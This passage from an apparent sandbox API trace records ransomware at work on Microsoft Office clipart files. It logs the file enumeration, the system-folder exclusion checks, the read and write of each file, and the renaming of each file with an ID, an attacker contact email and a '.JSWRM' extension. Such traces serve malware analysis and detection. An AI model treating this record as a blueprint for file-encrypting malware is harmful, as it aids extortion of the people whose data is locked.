hHeap=0x1e0000) returned 1 [0079.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01875_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.146] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2616) returned 1 [0079.146] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa30) returned 0x20c6c0 [0079.146] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa30, lpOverlapped=0x0) returned 1 [0079.148] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.148] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa30, lpOverlapped=0x0) returned 1 [0079.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0079.148] CloseHandle (hObject=0x314) returned 1 [0079.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0079.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0079.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0079.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0079.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.149] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01875_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01875_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.149] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6852, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01923_.WMF", cAlternateFileName="")) returned 1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2=".") returned 1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="..") returned 1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="...") returned 1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="windows") returned -1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="recovery") returned -1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="perflogs") returned -1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="documents and settings") returned 1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="system volume information") returned -1 [0079.149] lstrcmpiW (lpString1="HH01923_.WMF", lpString2="msocache") returned -1 [0079.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01923_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01923_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01923_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01923_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01923_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01923_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.150] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26706) returned 1 [0079.150] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6850) returned 0x24d210 [0079.150] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6850, lpOverlapped=0x0) returned 1 [0079.153] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.153] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6850, lpOverlapped=0x0) returned 1 [0079.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.154] CloseHandle (hObject=0x314) returned 1 [0079.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0079.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0079.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0079.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0079.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0079.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.154] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01923_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01923_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0079.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.155] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH02155_.WMF", cAlternateFileName="")) returned 1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2=".") returned 1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="..") returned 1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="...") returned 1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="windows") returned -1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="recovery") returned -1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="perflogs") returned -1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="documents and settings") returned 1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="system volume information") returned -1 [0079.155] lstrcmpiW (lpString1="HH02155_.WMF", lpString2="msocache") returned -1 [0079.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0079.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02155_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02155_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02155_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0079.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0079.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02155_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02155_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02155_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0079.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.156] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2704) returned 1 [0079.156] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa90) returned 0x22fd48 [0079.156] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa90, lpOverlapped=0x0) returned 1 [0079.158] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.158] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa90, lpOverlapped=0x0) returned 1 [0079.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0079.158] CloseHandle (hObject=0x314) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0079.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0079.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0079.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0079.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.158] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02155_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02155_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0079.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.159] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x52c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH02166_.WMF", cAlternateFileName="")) returned 1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2=".") returned 1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="..") returned 1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="...") returned 1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="windows") returned -1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="recovery") returned -1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="perflogs") returned -1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="documents and settings") returned 1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="system volume information") returned -1 [0079.159] lstrcmpiW (lpString1="HH02166_.WMF", lpString2="msocache") returned -1 [0079.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02166_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02166_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02166_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02166_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02166_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02166_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.162] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1324) returned 1 [0079.162] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x520) returned 0x203550 [0079.162] ReadFile (in: hFile=0x314, lpBuffer=0x203550, nNumberOfBytesToRead=0x520, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x520, lpOverlapped=0x0) returned 1 [0079.163] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.163] WriteFile (in: hFile=0x314, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x520, lpOverlapped=0x0) returned 1 [0079.163] HeapFree (in: 